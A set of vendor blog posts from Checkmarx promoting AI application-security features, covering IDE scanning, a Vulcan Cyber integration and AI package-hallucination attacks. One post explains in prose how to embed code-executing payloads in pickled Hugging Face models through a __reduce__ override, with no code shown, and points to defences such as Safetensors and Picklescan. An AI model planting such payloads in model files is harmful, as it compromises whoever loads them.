AI

Just Launched: Checkmarx AI Security

Jonathan Singer — Sun, 05 May 2024 22:00:00 +0000

Why AI Security? Because you deserve a better answer than “because everyone’s talking about it.”

There are two key challenges around AI that make this an essential area for AppSec platforms to address.

The first is that AI is disrupting the developer workflow that AppSec teams have worked hard to integrate with. We know that AI Large Language Models (LLMs) do not understand secure coding practices, however developers are increasingly relying on them to maximize their coding output. This results in a flood of insecure code being directed at already resource constrained AppSec teams. AppSec teams are finding themselves in an increasingly untenable situation, especially since many developers don’t understand or practice security coding, nor prioritize AppSec.

This brings us to the second challenge: AppSec is already hard! AppSec teams are generally under-resourced; they rely on working with cross-functional teams with often opposing incentives; and they face an increasingly complex code environment. Analysis and prioritization of vulnerabilities has already been difficult, and they have long given up on the idea of getting their vulnerability count to zero.

AppSec teams require cutting edge tools to keep pace – and Checkmarx delivers. Last year Checkmarx pioneered a strategic approach to help AppSec organizations get the most out of AI. Today, we are excited to announce the second wave of AI Security features from Checkmarx!

Checkmarx’ AI Vision

Checkmarx has a clear vision for the future of AI in supporting AppSec, and sees 3 key opportunities where we can provide meaningful assistance to our customers:

The Developer Workflow: Developers are, and will continue to use, AI for code generation. By plugging AppSec tools directly into the AI tools, Checkmarx aims to help secure code from the first line written, while also securing the software supply chain.
Accelerate AppSec Teams: AppSec teams want to use GenAI as a productivity tool in the same way that everyone else does. Checkmarx is creating tools and platform features to simplify AppSec management and increase daily efficiency for AppSec teams .
AI-Based Attacks: The use of new technology always brings new risks, and AI tools are no different. Checkmarx will help customers protect against risks targeting AI tools in the new developer workflow.

Building towards this vision, Checkmarx has already supplied developers with core features to help support the changing developer workflow experience that AI has created. These include our AI Security Champion for Infrastructure as Code (IaC), our AI Query Builder for reducing false positives, and our Checkmarx GPT integration that helps developers understand the open source risks of generated code.

Our newly launched features build on that momentum with more ways that allow developers to embrace AI in a way that is both comfortable to their workflow, and is mindful of the business’s responsibility to their (and their customers) data.

Auto Remediation for SAST

Resolving security vulnerabilities is a necessary evil for developers. It is often time consuming and involves significant research and context-switching. Each vulnerability has its own background that needs to be understood before a meaningful solution can be drawn up and implemented.

Our new auto remediation for SAST functionality, part of our AI Security Champion plugin, aims to significantly shorten the time and effort needed for developers to remediate vulnerabilities. Now developers can get meaningful recommendations presented to them, directly in their IDE, on how to resolve specific SAST vulnerabilities, making (not just finding but) resolving vulnerabilities much more practical and reasonable.

Want to learn more? Read about it here.

Checkmarx GPT

Code is code, regardless of if it is written by a developer, or copied and pasted from OSS, or generated by AI. It all needs to be scanned, and if you want to scan AI generated code successfully then you need to do it in real time. Checkmarx demonstrated how to do this with our initial Checkmarx GPT integration for ChatGPT, which allowed Checkmarx to analyze the generated code for malicious packages, hallucinations, and potential versioning and licensing challenges. We have further extended the Checkmarx GPT functionality by including the ability to perform a SAST scan as part of the process. Now, developers using ChatGPT can leverage a full security check of the generated code in real time and get remediation advice for specific vulnerabilities.

GitHub Copilot Integration

In the spirit of our Checkmarx GPT plugin, we know that many developers are using Copilot to drive their code generation needs. Many developers have Copilot integrated directly into their IDE, and just as we did with ChatGPT, we knew we needed to provide a real-time scan for Copilot-generated code. Our VS Code Plugin for Checkmarx now supports real-time IDE scanning for all types of code, including Copilot generated code, which allows developers to get a super fast SAST scan of the code, as it’s being created.

Read this blog post to get more details.

Prompt Security

Checkmarx cares about your data. We understand that for many organizations considering leveraging Generative AI, the risk of your data being accidently leaked is a tough to weigh out. Checkmarx is partnering with Prompt Security to help secure all uses of Generative AI in an organization: from tools used by your employees to customer facing applications. Checkmarx and Prompt are working together to help AppSec understand what is being passed to a Large Language Model, and providing ways to sanitize and block unwanted data from being shared.

AI in Your AppSec Program

It can get overwhelming trying to keep track of all the developments around AI. We are convinced they need to be integrated into your existing AppSec program purposefully, with a defined strategy and plan. So, we incorporated AI into our AppSec Maturity Model – APMA. When we discuss and assess your AppSec program with you, we will also consider your organization’s AI strategy. We will then work with you to build a way to leverage AI opportunities, while protecting against AI-related risks, using our AppSec AI solutions and best practices.

Learn More

As the adoption of generative AI in software development continues to grow, Checkmarx remains dedicated to guiding organizations through their AppSec journeys. By focusing on enhancing the developer experience, reducing false positives, and addressing the unique threats posed by AI, Checkmarx is paving the way for a more secure digital future. Our investment in advanced solutions reflects our commitment to not just identifying problems but also providing the solutions that empower developers to build safer, more secure software in the age of AI.

We’re at RSA this week and we encourage you to stop by our booth to see and participate in live demos of our most recent announcements, and check out the additional blogs linked within this blog post for more details!

Introducing Real Time IDE Scanning – More Secure Code in Real Time

Avi Hein — Sun, 05 May 2024 22:00:00 +0000

The need to shift left

The pressure to deliver quickly and efficiently is pervasive. Speed often comes at the expense of security. To address this, the “shift left” philosophy has gained traction among development teams. This emphasizes the importance of integrating security measures early in the development lifecycle, rather than as an afterthought. We have also spoken about the need for security to be integrated throughout the entire SDLC – allowing you to secure your applications from the very first line of code, to runtime and deployment in the cloud.

The rationale behind this strategy is straightforward: identifying and resolving security issues during the initial stages of development is significantly more cost-effective and less risky than making changes after deployment. By addressing security considerations earlier in the development process teams can prevent future headaches. This can also help get software to production faster, as it’s easier to fix in the development cycle.

The best way to secure applications is to bake security into the code from the start. Developers play a critical role in securing the software by adopting security best practices. However, that’s easier said than done. There is a gap between theoretical best practices and truly embedding security into development.

The security gap in software development

Software developers aren’t security experts. According to the Forrester report, “Show, Don’t Tell, Your Developers How To Write Secure Code,” none of the top 50 undergraduate computer science programs in the United States require a secure coding or secure application design class.

Bridging the skills gap and fostering security awareness among developers is critical. This is why Checkmarx offers security training such as Codebashing. However, training doesn’t equal instant changes. As a result, developers are relying on AI-generated coding due to the speed it provides and the mistaken belief that AI-generated code is somehow more secure.

The new frontier of AI-generated code

Traditional software development workflows are being reshaped with the proliferation of AI-generated code. GenAI tools, such as GitHub Copilot or Amazon CodeWhisper, fundamentally alter the coding process by providing suggestions, autocompleting code, and automating repetitive tasks. This shift represents a significant advancement in the field, with AI-driven assistants seamlessly integrated into coding workflows, enhancing human capabilities, and expediting development cycles.

AI-generated code is a double-edged sword. While it offers the potential of productivity boosts and tapping into collective knowledge, there are potential risks. Research into the increasing prevalence of AI-generated code and its potential to redefine software engineering practices, has also identified the potential of reduced code quality and security risks.

Often ignored by developers, AI tools can generate insecure code. According to research, “Participants with access to an AI assistant were also more likely to believe they wrote secure code, suggesting that such tools may lead users to be overconfident about security flaws in their code.”

Introducing real-time scanning in the IDE

Real-time scanning in the IDE offers a security best practice for developers that complements Checkmarx SAST. It analyzes and provides real-time insights for:

Human-generated code as it’s being written by software developers
AI-generated code using tools such as GitHub Copilot

This is a plugin for Visual Studio Code, and it scans in milliseconds, providing instant responsiveness in the IDE and even can scan source code repositories. In internal tests, we scanned over 1 million lines of code in under 10 seconds – much faster than other “developer-friendly” solutions.

Security best practices

Real-time scanning in the IDE provides the first step to ensure that source code follows security best practices. It’s not intended to replace thorough testing by your application security team or that undertaken by Checkmarx SAST, but rather to ensure that code – particularly AI-generated code – follows secure coding best practices. It does not test an entire application, but rather code snippets – a specific line of code plus the nearby lines of code. The scope of the analysis is a relevant short piece of code. By providing a few lines of code, the scanner provides a security review and points to potential issues that a developer should consider.

Unlike a complete SAST scan, it doesn’t find attack vectors such as SQL injection. It works by analyzing the adjoining lines of code so, unlike complete SAST solutions, it is not fully application aware. It looks at the “micro” — a few lines of code and provides suggestions for remediating the code snippets.

This makes it easy for developers to fix their code as they are writing it.

This is a win-win for security. By giving developers the opportunity to implement security best practices, it produces less and more accurate SAST results for the AppSec team.

How to get it

Real time insights are available in a freemium model. Users can get real time insights within a command line interface (CLI) executable available for free.

Additional features and real-time in-IDE scanning are available for customers with the “AI Security“ package. If you’re an existing customer, contact your account manager for more details. Not yet a customer? Get a free demo.

The Hidden Supply Chain Risks in Open-Source AI Models

Jossef Harush — Mon, 27 Nov 2023 22:22:17 +0000

HuggingFace Hub has become a go-to platform for sharing and exploring models in the world of machine learning. Recently, I embarked on a journey to experiment with various models on the hub, only to stumble upon something interesting – the potential risks associated with loading untrusted models. In this blog post, we’ll explore the mechanics of saving and loading models, the unsuspecting dangers that lurk in the process, and how you can protect yourself against them.

The Hub of AI Models

At first glance, the HuggingFace Hub appears to be a treasure trove of harmless models. It provides a rich marketplace featuring pre-trained AI models tailored for a myriad of applications, from Computer Vision models like Object Detection and Image Classification, to Natural Language Processing models such as Text Generation and Code Completion.

Screenshot of the AI model marketplace in HuggingFace

“Totally Harmless Model”

While browsing HuggingFace’s marketplace for models, “ykilcher/totally-harmless-model” caught my attention. I was excited to try it out, so I loaded the model using a simple Python script and to my surprise it opened a browser in the background.

This model was created by the Researcher and YouTuber Yannic Kilcher, as part of his video on demonstrating the hidden dangers of loading open-source AI models. I was inspired by his research video (which I highly recommend watching), so I wanted to highlight the risks of malicious code embedded in AI models.

The Mechanics of Model Loading

Many HuggingFace models in the marketplace were created using the PyTorch library, which makes it super easy to save/load models from/to file. The file serialization process involves using Python’s pickle module, a powerful built-in module for saving and loading arbitrary Python objects in a binary format.

Pickle’s flexibility is both a blessing and a curse. It can save and load arbitrary objects, making it a convenient choice for model serialization. However, this flexibility comes with a dark side – as demonstrated on “ykilcher/totally-harmless-model” – the pickle can execute arbitrary code during the unpickling process.

Embedding Code in a Model

To show how easy it is, we’ll use a popular model from the marketplace (gpt2) and modify it to execute code when loaded.

Using the powerful Transformers Python library, we’ll start by loading our base model, ‘gpt2’, and its corresponding tokenizer.

Next, we’ll declare a custom class called ExecDict, which extends the built-in dict object and implements the __reduce__ method which allows us to alter the pickle object (this is where we’ll execute our payload).

Finally, we’ll create a new model, ‘gpt2-rs’, and use the custom save_function to convert the state dict to our custom class.

Python script produces a copy of an existing model with an embedded code. Source

This script outputs a new model called “gpt2-rs” based on “gpt” and executing the payload when loaded.

Hugging Face (with collaborations from EleutherAI and Stability AI) has developed the Safetensors library to enhance the security and efficiency of AI model serialization. The library provides a solution for securely storing tensors in AI models, emphasizing security and efficiency. Unlike the Python pickle module, which is susceptible to arbitrary code execution, Safetensors employs a format that avoids this risk, focusing on safe serialization. This format, which combines a JSON UTF-8 string header with a byte buffer for the tensor data, offers detailed information about the tensors without running additional code.

In Closing…

It’s crucial for developers to be aware of the risks associated with LLM models especially when contribution from strangers on the internet as they may contain malicious code.

There are open-source scanners such as Picklescan which can detect some of these attacks.

In addition, HuggingFace performs background scanning of model files and places a warning if they find unsafe files. However, even when flagged as unsafe, HuggingFace still allows those files to be downloaded and loaded.

When using or developing models, we encourage you to use Safetensors file. If the project you are using has yet to transfer to this file format, Hugging Face allows you to convert it by yourself

For research purposes, I open-sourced here the various scripts I’m using to demonstrate the risks of malicious AI. Please read the disclaimer in this GitHub repo if you’re planning on using them.

Checkmarx + Vulcan Cyber: Enabling Customers to Mitigate AI Vulnerabilities

Michael Smythe — Tue, 21 Nov 2023 12:00:00 +0000

The impact of cyber-attacks on the global economy is predicted to be $10.5 trillion dollars by 2025. One area where threats and vulnerabilities persist is in the software development process, with AI risk now a growing concern.

Finding and fixing vulnerabilities is crucial, but traditional approaches often relegate security measures to the final stages of the software development lifecycle (SDLC). A proactive approach to vulnerability management and remediation is not just a nice to have, but a requirement, to protect your SDLC. By prioritizing vulnerability management earlier in the software development lifecycle (shifting left), the practice of identifying, classifying, prioritizing, remediating, and mitigating software vulnerabilities allows organizations stay one step ahead.

Vulnerability and risk management is an important part of the AppSec and developer toolkit, which is one of the reasons that Checkmarx partnered with Vulcan Cyber.

First to Market

Vulcan Cyber developed one of the first cyber risk management platforms which was built to help organizations reduce vulnerabilities and risks. The platform correlates, prioritizes, and manages vulnerability risk across all attack surfaces. It consolidates all vulnerability and risk data, correlating and de-duping scan results. It orchestrates risk mitigation workflows, delivers risk remediation intelligence, and enables developers and AppSec professionals to customize their risk compliance threshold and actively measure, track, and report risk reduction.

How it Works

While we have been partners with Vulcan Cyber for some time, we are pleased to announce a new integration with our Checkmarx One platform. This means that Vulcan Cyber is now integrated with our traditional Checkmarx SAST on-prem solution, as well as Checkmarx One SAST, SCA and IaC.

Checkmarx One is an application security platform used for scanning, prioritizing, and addressing security vulnerabilities in an organization’s applications, projects, or source code. Vulcan customers can bring vulnerability data from Checkmarx One into Vulcan Cyber to manage their application security and construct a more comprehensive view of their attack surface, thus strengthening their cybersecurity posture.

The Checkmarx One Vulcan Connector seamlessly integrates with the Checkmarx One platform to pull and ingest code project assets and vulnerability data in the Vulcan platform. Once the integration is complete, the Vulcan platform scans the report findings to correlate, consolidate, and contextualize the ingested data to impact risk and remediation priorities.

Plenty of Synergies with Vulcan Cyber

Checmarx and Vulcan both have a pedigree in leading threat intelligence teams and first party research into active threat actors. In fact, the Vulcan research team, Voyager18, and Checkmarx collaborated around our GenAI capabilities including the CheckAI plugin for ChatGPT. This industry-first AI AppSec plugin enables developers to scan generated code within the ChatGPT interface and provides remediation guidance and protects against malicious open source packages targeting GenAI-generated code.

Identifying AI Hallucinations

In particular, working with the Vulcan Cyber research team, we can collaborate to identify AI hallucinations, which is when ChatGPT provides customers with inaccurate information. We are now seeing such hallucinations being weaponized by hackers.

Attackers ask ChatGPT for coding help in common tasks. ChatGPT might provide a package recommendation that either doesn’t exist or isn’t published yet, in other words a hallucination. Then, the attackers create a malicious version of that recommended package and publish it so that when a developer asks ChatGPT for help on that problem, there is a package with a malicious payload waiting. Our CheckAI Plugin enables developers and security teams to protect against these attacks caused by malicious open source packages and dependencies while working within the ChatGPT interface.

Getting Started

Together, we are dramatically working to improve the end-to-end developer experience, while also continuing to expand the AI-driven security capabilities of our CheckAI Plug-in, by augmenting it with Vulcan Cyber AI research team.

For more information get in touch with your Checkmarx account rep or contact us today.